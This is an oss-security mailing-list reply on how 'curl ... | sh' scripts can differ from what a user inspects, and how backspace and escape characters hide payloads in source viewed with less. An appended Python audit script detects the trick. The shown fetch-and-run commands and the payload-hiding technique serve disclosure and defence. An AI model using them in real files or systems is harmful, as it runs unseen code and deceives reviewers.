Date: Thu, 21 Apr 2016 21:45:59 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: s/party/hack like it's 1999

* up201407890@...nos.dcc.fc.up.pt, 2015-09-17, 18:03:
>$ curl 127.0.0.1/backdoor.sh
>#!/bin/bash
>echo doing something very nice!
>
>$ wget -qO - 127.0.0.1/backdoor.sh
>#!/bin/bash
>echo doing something very nice!
>
>
>But if we pipe it into a shell...
>
>
>$ curl -s 127.0.0.1/backdoor.sh|sh
>doing something evil!
>
>$ wget -qO - 127.0.0.1/backdoor.sh|sh
>doing something evil!
>
>
>You might be thinking "If I opened that in my browser, I would detect 
>it being malicious!"
>Well, think again...
>One can have all sorts of fun with user-agents, something that can 
>easily come to mind is verifying if the user-agent is from curl or 
>wget,

...or this:
https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

>'less' doesn't interpret escape sequences unless the -r switch is used, 
>so stop aliasing it to 'less -r' just because there's no colored 
>output.

As somebody else noted, it should be s/doesn't interpret/neutralizes/ or 
something. But that doesn't mean you should feel safe if you don't use 
-r.

For example, when git automatically spawns a pager, it puts R in the 
LESS environment variable. (That would be fine if git escaped \033 
before passing them to the pager, but it doesn't. Oddly, it does seem to 
escape other control characters.) Now, -R is less convenient than -r for 
hiding malicious code, but you could still set foreground and background 
to black in hope that the victim's terminal background is also black.

But even without -r or -R, one can use backspace characters to hide evil 
payload:

| $ less -FX hello.c
| #include <stdio.h>
| #include <stdlib.h>
|
| int main(int argc, char **argv)
| {
|         /* Copyright 2015-2016 Jakub Wilk */
|         printf("Hello world!\n");
|         return 0;
| }
|
| $ gcc -Wall hello.c -o hello && ./hello
|  ________
| < ^H^H^H >
|  --------
|         \   ^__^
|          \  (oo)\_______
|             (__)\       )\/\
|                 ||----w |
|                 ||     ||

-- 
Jakub Wilk
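A defender-side check for the backspace and escape-sequence tricks discussed in this mail, as an added example (not code from the original thread or from the hello.c attachment): it renders each line the way a raw terminal would and reports lines whose rendering differs from the bytes a compiler or shell actually reads. The C fragment is constructed here, with "Example Corp" as a placeholder.

```python
# Added example: audit a fetched file for control bytes that hide content.
import re

# Bytes the tricks in the thread rely on: backspace (^H), carriage return, ESC.
SUSPECT = re.compile(rb"[\x08\x0d\x1b]")


def render_terminal(line: bytes) -> bytes:
    """Approximate what a raw terminal (cat) shows; CSI escapes are dropped."""
    out, pos, i = bytearray(), 0, 0
    while i < len(line):
        c = line[i]
        if c == 0x08:                      # backspace: cursor one cell left
            pos = max(pos - 1, 0)
        elif c == 0x0D:                    # carriage return: back to column 0
            pos = 0
        elif c == 0x1B:                    # ESC: skip "ESC [ ... final byte"
            if i + 1 < len(line) and line[i + 1] == 0x5B:
                i += 2
                while i < len(line) and not 0x40 <= line[i] <= 0x7E:
                    i += 1
        else:
            if pos < len(out):
                out[pos] = c               # overwrite an already shown cell
            else:
                out.append(c)
            pos += 1
        i += 1
    return bytes(out)


def audit(data: bytes) -> list:
    """(line number, what the terminal shows, raw bytes) for suspicious lines."""
    findings = []
    for n, raw in enumerate(data.split(b"\n"), 1):
        if SUSPECT.search(raw):
            findings.append((n, render_terminal(raw), raw))
    return findings


# Constructed sample in the style of the thread's hello.c: a statement is
# printed, erased with backspaces, then a benign comment is written over it.
INDENT, SHOWN = b"        ", b"Copyright 2016 Example Corp */"
EVIL = b'*/ puts("evil"); /*'
HIDDEN_LINE = INDENT + b"/* " + EVIL + b"\x08" * len(EVIL) + SHOWN
SAMPLE = b"#include <stdio.h>\n\nint main(void)\n{\n" + HIDDEN_LINE + \
    b'\n        printf("Hello world!\\n");\n        return 0;\n}\n'
```

Running `audit(SAMPLE)` flags only line 5, showing the comment-only rendering next to the raw bytes that still contain the `puts("evil")` call.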
